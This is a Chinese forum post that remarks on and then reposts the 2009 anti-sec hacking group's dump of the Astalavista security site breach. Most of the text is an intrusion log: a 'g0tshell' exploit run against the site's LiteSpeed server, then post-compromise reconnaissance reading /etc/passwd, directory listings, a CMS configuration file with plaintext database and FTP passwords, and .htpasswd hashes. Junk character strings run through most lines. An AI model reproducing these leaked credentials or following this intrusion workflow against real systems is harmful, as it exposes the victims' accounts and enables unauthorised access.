里面两个亮点,一是远程获得apache用户权限的shell,banner是LiteSpeed,看来这玩意有0day,但是又怎么是用apache用户跑的,原来LiteSpeed这东西是和apache绑一起的,大概看了下介绍,主要功能是anti-ddos,这东西貌似还有点意思,回头玩玩。具体的看链接标记[url]http://www.litespeedtech.com/litespeed-web-server-features.html[/url]。
: ^! L# d% R6 M2 o
6 O+ b" B1 @8 ?* G! h9 e[root@front3 ~]# curl -I litespeedtech.com+ u0 Q5 ] m$ K. i( R5 H) P1 q' O; ^4 j
HTTP/1.1 200 OK
3 n0 v ?, J# u0 a, d5 J: ~1 SDate: Fri, 05 Jun 2009 22:54:51 GMT
4 f5 K4 v$ s% r2 WServer: LiteSpeed
# ^: Z; p. t0 E% H7 J
+ ~5 G/ v$ q( G4 d0 S* V. R. i另外一个亮点就是localroot了,如果不是udev的话,那么就是RHEL5.3 x64还有一个localroot 0day -_-
7 \, _7 z6 l E' V9 p. S8 q1 c) _' A1 B" l5 P1 q# z
有人说astalavista被黑是因为Y拿milw0rm的东西赚钱,这个我觉得就是每个人的尺度问题,有人还把别人写的文章弄成自己写的,还有人把别人的程序改成自己的,多了去了。
" B+ H1 K; s. Q: @9 L7 x9 K3 ?7 |( {. S5 d1 f, s
: q# J+ I: ]8 U+ b/ _ \ / _____/\__ ___/ _ \ | | / _ \ \ / /| |/ _____/\__ ___/ _ \ - q) Z) N9 j/ |4 X
/ /_\ \ \_____ \ | | / /_\ \| | / /_\ \ Y / | |\_____ \ | | / /_\ \7 o( s |# U0 ]9 o; M1 k3 c0 P) m7 Z1 V
/ | \/ \ | |/ | \ |___/ | \ / | |/ \ | |/ | \2 R+ r2 ]; C* K: k Q2 ~8 ^
\____|__ /_______ / |____|\____|__ /_______ \____|__ /\___/ |___/_______ / |____|\____|__ /
, L' `, @2 l$ \6 B: I \/ \/ \/ \/ \/ \/ \/
: }8 O E; }( O& n The Hacking & Security Community. W& f$ i. A; G
[+] Founded in 1997 by a hacker computer enthusiast$ J; Z5 B- H% U
[-] Exposed in 2009 by anti-sec group
/ h+ x8 n7 C- ^5 \! ]) D
$ ~) g2 Y f. `% p" fFrom < <b style=”color:black;background-color:#ffff66″>http</b>://<b style=”color:black;background-color:#ffff66″>astalavista</b>.<b style=”color:black;background-color:#ffff66″>com</b>/faq>:8 V5 c# a0 W6 M5 o0 p5 T
>> 03. Who’s behind the site?9 C; H) ]' ?3 S' B8 p; f
>>" s" \6 q) Z& R% R# @
>> A team of security and IT professionals, and a countless number of contributors from all over the world.1 Q2 h. u' [$ c
' @" F+ W ~* h' L j5 K1 z( E1 i
>> 05. Is it true that the site is visited by script-kiddies and warez fans only? p/ B* p! m4 f; ?% P/ L7 q* `
>>6 \7 m% d! @& u8 g% j: v# ]5 }7 r
>> Absolutely not! The audience behind the site consists of home users, worldwide companies and corporations, educational and non-profit organizations, government and
% u* C3 M( A5 N8 h8 [/ M$ v3 Y! wmilitary institutions.
' a4 K# A* R0 K>> All of these have been visiting the site on a daily basis for the past couple of years, contributing in various ways, or requesting services and information.
6 n8 Z6 j# n) b* d, H% V$ c- u& R0 J% a. F* ^$ i+ I4 ^
Why has Astalavista been targeted?9 W2 [0 f8 v F! l8 T
# ~2 V6 T6 R1 _+ Y1 Z! B: S
Other than the fact that they are not doing any of this for the “community” but
q: t! d9 y9 R+ P+ M3 x: tfor the money, they spread exploits for kids, claim to be a security community
/ G, n: N6 |' i. j, ~ S; m, [(with no real sense of security on their own servers), and they charge you $6.66
9 k( X0 I# J( P# b# o5 W% gper months to access a dead forum with a directory filled with public releases
2 s" ]' I/ n; `9 B- ~$ @/ [and outdated / broken services.
% y. W" x7 I+ G( E. t
2 @" H4 l; m: _5 }( ~* t D9 XWe wanted to see how good that “team of security and IT professionals” really is.
: G+ x! g2 Y) `' Q! g/ n
6 I+ G7 I1 r2 Y0 BLet’s begin.
, V- Y6 f& f: \6 J, T8 t
7 W' e# E' G& E7 n- _% N7 _anti-sec:~# ./g0tshell astalavista.com -p 80
6 z* o b$ p, k' q/ v; I[+] Connecting to astalavista.com:80
4 l# m' q% p& a0 Y; I6 _7 ~1 o[+] Grabbing banner…5 ]5 q1 C o8 n. K
LiteSpeed2 g6 M) A5 A1 n
[+] Injecting shellcode…$ X) L( F, N2 L: i$ v5 W
[-] Wait for it
' t# A# S* G6 f4 r; R2 |6 @
) W/ ?- L$ Q6 h- B[~] We g0tshell3 z# Y" S4 {' m, w' L+ m; h
uname -a: Linux asta1.astalavistaserver.com 2.6.18-128.1.10.el5 #1 SMP Thu May 7 10:35:59 EDT 2009 x86_64 x86_64 x86_64 GNU/Linux7 q# d1 D. S* \/ H' E
ID: uid=100(apache) gid=500(apache) groups=500(apache)# \% X+ g1 W8 C
% |4 M% }& U% _# u# n: k9 y
sh-3.2$ cat /etc/passwd
* ` ]# Y/ e$ @% p4 F! E8 q* ~root:x:0:0:root:/root:/bin/bash; _+ f" M9 O2 V) q
bin:x:1:1:bin:/bin:/sbin/nologin G. R/ Q0 s* I+ B5 i2 |
daemon:x:2:2:daemon:/sbin:/sbin/nologin
+ v7 Z: P; M1 W- s) A+ G5 k: \adm:x:3:4:adm:/var/adm:/sbin/nologin
8 F# K; b' U' _& s$ hlp:x:4:7:lp:/var/spool/lpd:/sbin/nologin5 g- D0 U0 ?+ e" ]
sync:x:5:0:sync:/sbin:/bin/sync) f8 n' P! r; j" L
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown5 ?& Y; k E6 N" w9 F( J% `
halt:x:7:0:halt:/sbin:/sbin/halt6 `% H& L. h" ? O' f# t5 l2 i
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin5 Z$ A# a0 g/ K
news:x:9:13:news:/etc/news:
# d( `+ {* ?' F! R; Y! z5 p; duucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
- O% ^; o" R" F# D* k# woperator:x:11:0 perator:/root:/sbin/nologin
/ H2 P5 g& c: m. @% u4 s. Cgames:x:12:100:games:/usr/games:/sbin/nologin
, e$ {# E& K) Cgopher:x:13:30:gopher:/var/gopher:/sbin/nologin
' W2 J4 m# _( ^; X9 x2 Jftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
4 _2 E$ i' e7 ~9 T5 [nobody:x:99:99:Nobody:/:/sbin/nologin
1 z- X2 C6 `9 Q3 A. h; ^" Prpm:x:37:37::/var/lib/rpm:/sbin/nologin2 v/ D2 @8 `- t$ F& J' i
dbus:x:81:81:System message bus:/:/sbin/nologin
% R5 g1 Q- N! `, a h0 Enscd:x:28:28:NSCD Daemon:/:/sbin/nologin
! b4 `' F- d8 }; w0 N# {* Vmailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
. Q, E* x7 @, q1 t- Usmmsp:x:51:51::/var/spool/mqueue:/sbin/nologin2 y* w, t' a1 |9 \
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
: M: t6 ]* C# g6 r1 o, dhaldaemon:x:68:68:HAL daemon:/:/sbin/nologin7 u& h$ L+ k5 z) {5 y- a; o
rpc:x:32:32 ortmapper RPC user:/:/sbin/nologin
4 s! u, L5 C/ T: L8 {& k4 a8 [2 Z! f/ Xrpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
' q4 W4 J6 w! S2 f# }& e. Q7 Unfsnobody:x:4294967294:4294967294:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
) ~/ r+ }9 [3 z+ Hsshd:x:74:74rivilege-separated SSH:/var/empty/sshd:/sbin/nologin
( ?% I% z; T2 @! Spcap:x:77:77::/var/arpwatch:/sbin/nologin
0 h7 B2 [' B9 o+ rnamed:x:25:25:Named:/var/named:/sbin/nologin/ |( T) P2 c4 Z7 {4 d0 k3 D
apache:x:100:500::/var/www:/bin/false( Z2 g0 i% g9 ]! t1 T" n1 c
diradmin:x:101:101::/usr/local/directadmin:/bin/bash
+ C2 s6 d) \2 |- O: F1 w# o0 x4 x1 smysql:x:102:102:MySQL server:/var/lib/mysql:/bin/bash% G+ D/ r$ O+ \8 w" ~2 y
webapps:x:500:501::/var/www/html:/bin/bash+ w# y. w" r( f: X% s0 e7 |
majordomo:x:103:2::/etc/virtual/majordomo:/bin/bash) l/ K K n5 E
admin:x:501:502::/home/admin:/bin/bash
5 o8 M9 v% [7 V9 H g; zjon:x:502:503::/home/jon:/bin/bash
6 f ? @; K# A* v9 Acom:x:503:504::/home/com:/bin/bash* {% Y; [! g& T( Z: Y1 j
ntp:x:38:38::/etc/ntp:/sbin/nologin5 s/ p) P1 o. d7 D# ]! V
ais:x:39:39penais Standards Based Cluster Framework:/:/sbin/nologin
$ b% p7 R$ L- f( D! B; Iastanet:x:504:505::/home/astanet:/bin/bash
% _/ S( y8 N# i8 q! \* x& @avahi:x:70:70:Avahi daemon:/:/sbin/nologin( [8 Z% ~8 |: o' L8 ]# {, q
avahi-autoipd:x:104:103:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin
, ]5 ~3 d1 j6 B. T0 {$ a
7 [/ j! u9 v/ [sh-3.2$ cat /etc/hosts
1 q; M% N( g' l* A# Do not remove the following line, or various programs1 _- ~9 R3 U! u0 k8 V% d$ K
# that require network functionality will fail.- J* s- u4 }& k' q
127.0.0.1 localhost.localdomain localhost
( Z' B! b$ |$ M4 I& R, u7 {0 S8 B::1 localhost6.localdomain6 localhost6' x! M. u+ v/ l5 Y
80.74.154.172 asta1.astalavistaserver.com" }8 o/ e4 L1 L/ X. C0 g
" y" M# t3 k( Z+ U8 _& Jsh-3.2$ pwd
# [' k/ L% \& ~$ u, b) ~/home/com/public_html
1 I# ]4 k) ~4 d# u8 T1 b5 C0 B2 v1 Z& L0 [* k/ Q3 A, C V
sh-3.2$ ls -la
! u/ Q0 p7 p$ V! W* N: b/ g( {& _total 18460. w; t4 e+ n4 V7 U8 p- z, j6 n
drwxr-xr-x 30 com apache 4096 May 28 17:06 .
! M% T# B7 e" F$ _/ w4 Mdrwx–x–x 11 com com 4096 Jun 25 2008 ..
$ s; D9 V ^' N/ L Udrwxr-xr-x 2 com com 4096 Feb 2 19:29 admin
& ? |! f b: N: ndrwxrwxrwx 2 com com 18591744 Jun 4 08:04 cache; {3 X) }% n' K* s; ]: p
drwxr-xr-x 6 com com 4096 Mar 28 21:17 cadmin& A- K/ I0 c) A1 T1 ]: H# Z7 O
drwxrwxrwx 2 com com 4096 May 19 00:50 config8 ~# v: A( w: }& `' q& p
drwxr-xr-x 2 com com 4096 Mar 20 11:05 core
- o2 n# y+ p, B: i9 ?drwxr-xr-x 18 com com 4096 Feb 2 19:29 core_modules
1 B' ~+ }* b6 K& I: d' J* Sdrwxr-xr-x 4 com com 4096 Feb 2 19:29 customizing
- U0 P" Y0 D; \$ b- b3 xdrwxr-xr-x 2 com com 4096 May 11 13:24 customizing_paulo" `1 E3 W3 Z/ A3 H4 e& J( _' C$ U2 A
drwxr-xr-x 6 com com 4096 Mar 30 12:28 __DELETE__
, V+ F7 [% F/ R-rw-r–r– 1 com com 8035 May 19 14:26 directory_to_mediadir.php
( a" ^. o# O4 i+ H0 C) b1 z# Bdrwxr-xr-x 2 com com 4096 Sep 9 2008 dvd% K j% E/ [2 l9 ?) F+ [
drwxr-xr-x 3 com com 4096 Feb 2 19:29 editor: l) \* k% U5 N1 Q& S, U1 B0 M
-rw-r–r– 1 com com 3750 Feb 27 16:12 favicon.ico' E7 U$ K: K( v4 {0 w
drwxrwxrwx 2 com com 4096 Jun 4 08:00 feed
$ o( b. R6 r! b6 I' H-rwxrwxrwx 1 com com 10736 May 29 12:44 .htaccess7 Q9 x8 L+ j3 H- l8 M% V/ w5 f
-rw-r–r– 1 com com 7638 Apr 21 08:45 .htaccess.2009-04-21.bak) c( u3 `) j/ c& s
-rw-r–r– 1 com com 10768 May 11 11:53 .htaccess.2009-05-11.bak0 W; M6 B% W1 i
drwxr-xr-x 18 com com 4096 Apr 9 2008 ideapool
6 `: q5 U6 Q* ]# \9 k9 tdrwxrwxrwx 14 com com 4096 Feb 2 19:29 images% Y* w, w9 u2 E. x% F" |8 [
-rw-r–r– 1 com com 97496 Jun 2 13:01 index.php# F8 N( w0 x P6 j
drwxr-xr-x 6 com com 4096 Feb 2 19:29 installer
3 K) j: o. N. _% \drwxr-xr-x 8 com com 4096 Feb 2 19:29 lang
$ k' \5 p1 f( r' s! A& K7 D# Y5 fdrwxr-xr-x 22 com com 4096 Feb 2 19:29 lib
5 C0 e0 W5 f2 Tdrwxrwxrwx 12 com com 4096 Jun 2 07:47 media* H# j7 h& t# p) v) f& a; m
drwxr-xr-x 8 com com 4096 May 11 12:48 modifications
: s& g& C9 g1 D1 F Cdrwxr-xr-x 34 com com 4096 May 28 16:30 modules
L* v/ L4 W9 q3 E+ Adrwxr-xr-x 11 com com 4096 Jan 30 15:00 _myAdmin, C7 e4 B9 _+ a% k) K _9 a- l- i; I
drwxrwxr-x 22 com com 4096 May 28 17:06 _new5 Y2 N: A' u# |9 d: `
drwxr-xr-x 26 com com 4096 Feb 2 19:27 _old
5 x/ h0 `$ P% ~, }+ Y) pdrwxr-xr-x 2 com com 4096 Mar 30 12:29 phproxy* ^: F- b4 d+ {/ @! F: `* c* g
drwxr-xr-x 2 com com 4096 Mar 30 12:30 proxy2 C' t$ m& [) }4 I7 Q9 I @6 V: ^
-rw-r–r– 1 com com 26 Feb 2 19:33 robots.txt/ p$ A% A+ m, _5 G' u8 F2 Q
-rwxrwxrwx 1 com com 10844 Jun 2 09:50 sitemap.xml
1 I8 ~. j: z8 n1 y/ L. m/ a3 `-rw-r–r– 1 com com 223 Mar 30 15:32 test.php
$ j- B* x& S% e/ O/ |: a5 X1 a' v& q9 tdrwxrwxrwx 8 com com 4096 Mar 6 13:15 themes4 i3 g# l& r9 O& s
drwxrwxrwx 3 com com 4096 Jun 4 08:00 tmp
; U' @' B- O3 j9 i! ~8 t4 q" Xdrwxr-xr-x 3 com com 4096 Feb 2 19:33 webcam( J5 t2 b! p C& ~
2 I/ t9 s5 s0 Y) T0 V( [9 }
sh-3.2$ head -20 index.php
) e* b, U: P$ d5 A* J5 D/ K$ i- T<?php
) m# S) z$ \' A, I" l
( l1 Z3 E/ I7 s, U" s3 \8 N; T& d" K6 E/**
+ b, q! i& d$ X9 v1 ~- v5 B0 t* The main page for the CMS( A& T9 ~+ p d% b: _
* @copyright CONTREXX CMS - COMVATION AG
7 ~) s5 \5 I$ x6 [8 o; ~4 l* @author Comvation Development Team
4 B* m. j/ B( I/ ^; s* f* @version v1.0.9.10.1 stable
! E+ i$ \1 p5 D. T0 b( E. `* @package contrexx; S! ]( i& c1 U: ~: _8 U; S
* @subpackage core& \3 A$ d4 Z- C3 l3 a* [
* @link 链接标记[url]http://www.contrexx.com/[/url] contrexx homepage
9 c& E2 i1 _% B5 I Z' v* @since v0.0.0.0
" ?6 x" g- \6 j' i* @todo Capitalize all class names in project5 C3 W' y$ o L' }2 e! Q
* @uses /config/configuration.php
, Y+ ~ p1 t S7 [3 S* @uses /config/settings.php
3 i6 L# s% i9 ?# x& M* @uses /config/version.php! p! Q6 u& f* k9 L! u( _
* @uses /core/API.php4 _+ g2 E! _3 L
* @uses /core_modules/cache/index.class.php. B l) B/ v( F* w
* @uses /core/error.class.php7 j; r' Q" E# d9 k: C
* @uses /core_modules/banner/index.class.php6 K# ]- w8 F6 i
* @uses /core_modules/contact/index.class.php
/ f0 F/ X* e. f% t' h9 F' k* Z9 w+ P4 w" t& b2 f' y6 W
sh-3.2$ cd config/
9 g& ~; O$ s8 n# csh-3.2$ ls -la0 s% v6 H& q( b3 G
total 32$ L! y" o$ W! H" E" B: B
drwxrwxrwx 2 com com 4096 May 19 00:50 .# q6 d$ A5 }+ I d. @* J; n
drwxr-xr-x 30 com apache 4096 May 28 17:06 ..$ ]5 P3 e: T8 x% M# L4 W
-rwxrwxrwx 1 com com 2998 May 11 12:29 configuration.php
5 X2 U) g: A# }* v* f. p% O-rwxrwxrwx 1 com com 7610 May 28 17:27 set_constants.php' _( }4 h( @+ E# `; w. |6 j
-rwxrwxrwx 1 com com 4186 May 25 12:54 settings.php2 ^/ P* Z/ c1 n4 s! J" a
-rwxrwxrwx 1 com com 672 Feb 2 19:29 version.php, {4 ?, e6 t2 H3 R( w$ _! A
# G7 q' S+ _& q5 t
sh-3.2$ cat configuration.php
) j4 W0 H) [, ][snip]& E* `8 r0 r- ^6 \7 B9 ~4 |
$_DBCONFIG['host'] = ‘localhost’; // This is normally set to localhost+ v, F; {) D+ T4 x' }7 `+ b% T
$_DBCONFIG['database'] = ‘com_contrexx2_live’; // Database name) W* Q, j( w9 ?% y2 ~3 |* P) ]
$_DBCONFIG['tablePrefix'] = ‘contrexx_’; // Database table prefix
7 q' _3 U, \8 u+ p' @( y" ~ p# V$_DBCONFIG['user'] = ‘contrexxuser2′; // Database username7 |$ N6 `; t- S- V( @% o6 A
$_DBCONFIG['password'] = ‘0fEYNZgXz1pKe’; // Database password
2 t! f+ X! v& I: k9 }+ y$_DBCONFIG['dbType'] = ‘mysql’; // Database type (e.g. mysql,postgres ..)
7 P; {: a; o3 B$_DBCONFIG['charset'] = ‘utf8′; // Charset (default, latin1, utf8, ..)1 t. B" S/ Q6 k' v0 D0 q# u; D
[snip]
" |2 r( b, z( j! `$_FTPCONFIG['is_activated'] = true; // Ftp support true or false
! V/ a5 [$ g. K( X1 M' g) d8 [% @$_FTPCONFIG['use_passive'] = true; // Use passive ftp mode1 M' W" E" ?$ u, c& J$ F) S
$_FTPCONFIG['host'] = ‘localhost’;// This is normally set to localhost
5 E: N$ k* s. K$ }$ S. Z$_FTPCONFIG['port'] = 21; // Ftp remote port! `: S" ^+ v* r+ [& ?0 G- K
$_FTPCONFIG['username'] = ‘链接标记dev@astalavista.com’; // Ftp login username, \( R3 g% Y$ X* q) Q5 {& P
$_FTPCONFIG['password'] = ‘jajklop0Iuj’; // Ftp login password
( |, i. n" _9 _2 D* p$_FTPCONFIG['path'] = ‘/’; // Ftp path to cms3 T$ w8 i+ }" X" U8 N
4 b6 k1 ^- G: ^6 ]( y
sh-3.2$ cd ... h8 ~* l/ m$ E+ R/ V& R
sh-3.2$ cd dvd/ x) `- H% H) U D2 E
sh-3.2$ ls -la
6 j4 Q' `3 `' I3 ^total 2913780
: s( o( G1 f) R; V3 xdrwxr-xr-x 2 com com 4096 Sep 9 2008 .
Y, o9 q# j8 D& ?$ u) z( I% ]drwxr-xr-x 30 com apache 4096 May 28 17:06 ..6 I1 J0 J+ p4 o; `, W2 B
-rw-r–r– 1 com com 1050061483 May 16 2008 astalavista_security_toolbox_dvd_2008.part1.rar
& v& o+ ^3 c' k6 Y-rw-r–r– 1 com com 1050061483 May 16 2008 astalavista_security_toolbox_dvd_2008.part2.rar3 \6 J3 u, e% i* e7 z% \4 |
-rw-r–r– 1 com com 880644069 May 16 2008 astalavista_security_toolbox_dvd_2008.part3.rar
4 U$ G# g- Z; ?-rw-r–r– 1 com com 115 Jan 29 2008 .htaccess
: E; ?( ~. U. I7 V/ K0 `5 A! i, j. P
5 w8 q/ h3 D# fsh-3.2$ cat .htaccess! t# d0 O+ y/ N: H% n# |
authType Basic
: o- j7 ^& J" I; X- d: c4 O9 E/ MauthName DVD0 y, F: E4 g+ B9 \/ H. j3 G
authUserFile /home/com/domains/astalavista.com/.htpasswd/.htadm_pwd9 I- m/ M+ e- i) j5 `1 G
require valid-user+ Q2 j" V# A& X" m5 `
( h. r3 q1 [% n8 E# K0 `. |
sh-3.2$ cat /home/com/domains/astalavista.com/.htpasswd/.htadm_pwd2 n( `7 N: ]# x5 a
DVDdownload:CRD8cuY6.MPT6
) [9 `3 T: S' w* R) G4 JDVDdownload2:CR8a36.wluFMg
; f6 \: J! _, h: P6 x8 b# j6 V. T3 f" [8 \) M7 E9 e* M
sh-3.2$ cat test.php. [' t. `: y' x \* ?& _
<?php
) q# v( q2 ~5 f% V' c, W1 F$url = ‘aHR0cDovL2kubnVzZWVrLmNvbS9pbWFnZXMvdGVtcGxhdGUvMzYweDMxOC9pc3QyXzc0Njc4MV9mZW1hbGVfc3R1ZGVudC5qcGc%3D’;
$ ^* s3 p3 J/ f+ ^$url = str_replace(array(’&’, ‘&’), ‘&’, base64_decode(rawurldecode($url)));6 h: ^* }, t, M) k$ t2 l, R# C& p" x
echo $url;
* F+ f# P8 _8 E( B$ S5 U- y3 M6 e?>% Q2 [# C& `" V N( D
6 f' J- S' N: M' P/ D/ W( r u: fsh-3.2$ cd modifications/
2 ]5 M Z2 q1 K/ X; p5 esh-3.2$ ls -la
4 Q0 s5 u9 G' j Ptotal 32
/ A2 k5 N8 y, a: E8 ~drwxr-xr-x 8 com com 4096 May 11 12:48 .
1 ?3 v5 X; k' H" i& H ?drwxr-xr-x 30 com apache 4096 May 28 17:06 ..) z+ W% W6 ?! P
drwxr-xr-x 3 com com 4096 Feb 2 19:33 com_avtng
/ Y# N3 |1 H9 y7 Q2 s" o' u& ddrwxr-xr-x 3 com com 4096 May 12 09:26 cronjobs
' c5 p9 m7 U3 k. }3 i) ]drwxr-xr-x 2 com com 4096 Mar 2 10:35 onlinetools: r: w, U: I q H
drwxr-xr-x 4 com com 4096 Feb 2 19:33 pjirc
$ R& U: i" L' D/ s0 ?! sdrwxr-xr-x 2 com com 4096 Feb 2 19:33 search
& [) Z6 t$ a! E9 }0 `% c Mdrwxr-xr-x 2 com com 4096 Mar 25 08:56 _tmp
; g6 @& I: w% E- v4 c6 F: }% h. ]) |: s. g% w, ?
sh-3.2$ ls -R
5 E8 p! Y6 H9 H.:: q6 w( }1 y* f
com_avtng cronjobs onlinetools pjirc search _tmp! s8 K) ~2 I* m, |5 |
" E, x0 J9 i- c7 y
./com_avtng:
) h- Q# l# L$ W9 g7 Y8 ?! }8 Bavtng.php banner_bottom.inc.php banner_button.inc.php banner_content.inc.php banner_popunder.inc.php banner_right.inc.php banner_top.inc.php iframe.php scripts
5 L* o5 F0 K* b: Q* g& C
6 Q4 `# K" T5 m. {# u6 f Q./com_avtng/scripts:
, ]0 E4 s9 B8 ?6 _' P9 ppopunder.js( t/ p5 l- `6 e" U# y! ~
* f* `' } j; ^$ ~2 X
./cronjobs:% L$ |) E8 t! [* ~0 R2 l
exploits.php exploits.sh google_blogindexing.php ip2country.sh proxydb2.php proxydb.php securitynews.php tmp) Y& w/ _( Q# e0 q- S C# d! Y; w# S
/ u! r+ i4 F& N% Y$ X* x9 J+ ]' ~
./cronjobs/tmp:
2 h, l' S2 ^. u3 _contrexx_module_onlinetools_defaultports.csv contrexx_module_onlinetools_geolitecity_country.csv
4 e8 m$ W6 P! K, |4 F# k+ `. m
9 @, w9 N" ^/ U./onlinetools:% C" q7 n( l& L# g, L$ E% r
index.php& {# G! S0 n. D* R( F: h9 D
$ N$ K: @. k: J+ o6 y
./pjirc:& S2 `# D: y) x8 Z, w2 M' W
a_big.jpg english.lng img irc.jar NormalApplet.html pixx-french.lng pjirc.cfg securedirc-unsigned.cab thanks.txt" f9 ?/ `) G4 Z
AppletWithJS.html french.lng IRCApplet.class irc-unsigned.jar pixx.cab pixx.jar readme.txt SimpleApplet.html versions.txt
4 f# h0 ?8 W$ R1 Kbackground.gif HeavyApplet.html irc.cab license.txt pixx-english.lng pixx-readme.txt securedirc.cab snd
# w( `/ J, v# {' S" r2 ~2 T3 N0 M& v
./pjirc/img:* J# X& K' Y, u, n% B; @3 [
ange.gif bombe.gif clin-oeuil.gif content.gif enerve2.gif garcon.gif langue.gif mecontent.gif ordi.gif portable.gif sapin.gif triste.gif
- J+ I2 o/ C3 |" J/ Karbre.gif bouche.gif clin-oeuil-langue.gif cool.gif femme.gif grognon.gif lettre.gif newbie.gif pere-noel.gif pouce-non.gif sleep.gif
$ B9 A/ U3 s* c" E7 m: jverre-eau.gif
- w; ?" {1 V( |. X i. o# wargh.gif bouqin.gif coeur-brise.gif diable.gif fille.gif halloween.gif lit.gif OH-1.gif pleure.gif pouce-oui.gif soleil.gif 5 E: p0 V. w7 I8 X+ Z
verre-vin.gif9 {5 o9 a3 J7 S$ Y3 [; p
ballon.gif cadeau.gif coeur.gif dwchat.gif fleur.gif hamburger.gif love.gif OH-2.gif poisson.gif roll-eyes.gif sourire.gif yinyang.gif
' W, I" m- U7 I( P# pbiere.gif chien.gif comprends-pas.gif enerve1.gif fume.gif homme.gif lune.gif OH-3.gif pomme.gif rouge.gif terre.gif
" v/ i6 ~& h; ~) p3 y) D
: ^+ `$ h: q3 p" O./pjirc/snd:" z) Q! \9 j; d! g3 |, p
bell2.au ding.au: c/ H. W3 }/ J( ]+ y3 }
% E; O4 K/ \! O/ M2 x./search:8 t! t8 r: u/ p: g; W5 C
searchEngines.php search.php
7 h! c- H' [' O. k# P" ~. X c' |2 q! o# b
./_tmp:6 D% t' ~6 O0 {( ?2 w3 h
defaultPorts.php defaultPorts.txt
& I) w1 w6 b- Z( F- X! }5 Q2 G) |* t! s9 f
sh-3.2$ cd cronjobs/9 Q/ L5 J1 N3 `& x0 C
sh-3.2$ cat exploits.php
, a, P% q/ k$ `- s[snip]
9 h$ d' |: ~( |$categories = array();
) h$ Q4 [# c, m5 S$ C& e$milw0rmFile = FULLPATH . ‘/modifications/cronjobs/tmp/milw0rm/sploitlist.txt’;
$ J' Q7 g5 M0 [4 F$expolits = file($milw0rmFile);2 [7 q8 a; T2 t/ B4 E$ b
$comExploits = array();8 T' f" N5 N* v9 G, N
[snip]+ y& I' N+ ?/ d, ]9 E& o
// manage data9 W, ?7 a) X" d b8 }- {( g% k6 w
for ($x = 0; $x < count($expolits); $x++){ // count($expolits) - 2640
+ d$ f; f" R6 X8 N! q
0 {8 T2 A6 e: } // get path and title
" x# a2 G! j4 n+ H" n $expolits[$x] = trim($expolits[$x]);, s( L+ u- j* n9 R# p
$path = str_replace(’./’, FULLPATH . ‘/modifications/cronjobs/tmp/milw0rm/’, substr($expolits[$x], 0, strpos($expolits[$x], ‘ ‘)));6 d& l7 Z ?8 @ _6 F' @4 S$ d( D
$title = htmlspecialchars(substr($expolits[$x], strpos($expolits[$x], ‘ ‘) + 1, strlen($expolits[$x])), ENT_QUOTES);
+ n, q0 W" |$ Y# L/ o2 \0 k( {3 b0 ^, `- J4 w w4 L% Y
// check if file exists K7 Q1 A3 \6 _; u
if (file_exists($path)) {
+ L4 z% s% W+ ^- g. \8 u0 D- \" l5 j& P% |9 `
$text = file_get_contents($path);+ v: ^% H6 Z0 H
$ K% i* F7 b0 Q# a // get content and date; A @' l% _4 |7 o( z' V) d1 O0 y ]2 e
//$text = htmlspecialchars($text, ENT_QUOTES);
m, c* X1 |& k# K t $tmptext = addslashes(htmlentities($text, ENT_QUOTES, “UTF-8″));
6 J4 p. b4 J' i if ($tmptext != ”) {
! ?/ C; ?7 ?2 ? ]( x $text = $tmptext;# e6 i, h3 k0 N1 y' @
} else {$ Q% Y5 j) {7 y5 M- k! v
$text = addslashes(htmlentities($text, ENT_QUOTES));# Q& C* c2 d1 D6 ^7 |$ C6 B& B- C
}
( ?' M. G6 q n; g) Q3 o- g $date = str_replace(’milw0rm.com [', '', str_replace(']‘, ”, strstr($text, ‘milw0rm.com [')));' R1 O- O. s7 i: J
$tmp = explode('-', $date);
( U) m3 p' B! H1 M0 D $date = mktime(0, 0, 0, trim($tmp[1]), trim($tmp[2]), trim($tmp[0]));
( {, ` l( p0 S4 `. v: n% u1 S& O $cat = getCategory ($path);/ p$ x; }" q' d |# ^. ]
$ext = pathinfo(basename($path));
+ f- `# Q2 Y2 u' o; h( G# M $ext = $ext['extension'];
, U% @9 J% P6 ]) a $qStr = ”% i. H: f$ g. T
SELECT `id`: P3 Z# f' |! u5 T$ N* `
FROM `contrexx_module_exploits`. D/ O' B8 J- C* G9 k: g( c* e# J
WHERE `title` = ‘” . $title . “‘3 V \8 d( O$ O+ X
AND `date` = ‘” . $date . “‘
) h, n, h0 |8 G3 }1 i “;% W# `3 I. N! m% B0 @' k# E2 H( e( c
echo $x + 1 . ‘ von ‘ . count($expolits) . ‘ -> ‘ . $qStr . “\n”;
2 r: j4 {$ X1 W $q = $_objDB->query($qStr);# C) x( p! q( j6 ]5 C! u$ {
" R6 g9 D1 q! Z, [
if ($q->numRows() == 0) {; J7 ^7 r8 [- e+ ]1 [2 H( B5 o
* M" E; C+ ^4 v( ~) T& |: s // prepare array
( |9 r2 G- }* q D6 j $comExploits[$x]['date'] = $date;" q3 l c, O1 y& {/ A
$comExploits[$x]['title'] = $title;
8 a& [/ A4 \! f $comExploits[$x]['author'] = ‘milw0rm’;
6 V5 \5 v# B! t; P+ } $comExploits[$x]['text'] = $text;
' r5 c! q1 T" F- S) ?% A $comExploits[$x]['source'] = $ext;) i2 @6 H: g; N
$comExploits[$x]['url1'] = ”;
' z" |" X- c8 o) H9 c $comExploits[$x]['url2'] = ”;: [* x8 S3 }+ w. ~$ F/ @
$comExploits[$x]['catid'] = $cat;
5 `. q2 {+ f4 D! X0 v8 g $comExploits[$x]['lang'] = ‘2′;0 g+ C X2 ?6 _8 z& X6 |8 {
$comExploits[$x]['userid'] = ‘12′;
1 Z- X5 ?- ]- ]( T- U: I( o& M $comExploits[$x]['startdate'] = ‘0000-00-00′;8 S* ?5 R0 [0 Q
$comExploits[$x]['enddate'] = ‘0000-00-00′;5 Y9 M; b& f6 b6 ^' f
$comExploits[$x]['status'] = ‘1′;
2 V( f4 j* K5 [7 V8 u, H2 u $comExploits[$x]['changelog'] = $date;8 b: c: {0 L7 ]# O
, n; n F3 D; o$ t P( Q( v% V
}
' e/ S0 L) E+ Y; o+ u0 H[snip]' ~9 f! f9 G' J) f1 E
$xml = ‘<?xml version=”1.0″ encoding=”UTF-8″?>
8 S3 b- b2 U. T- y( f<rss version=”2.0″>& G* k% B h& q: G! V) e6 M
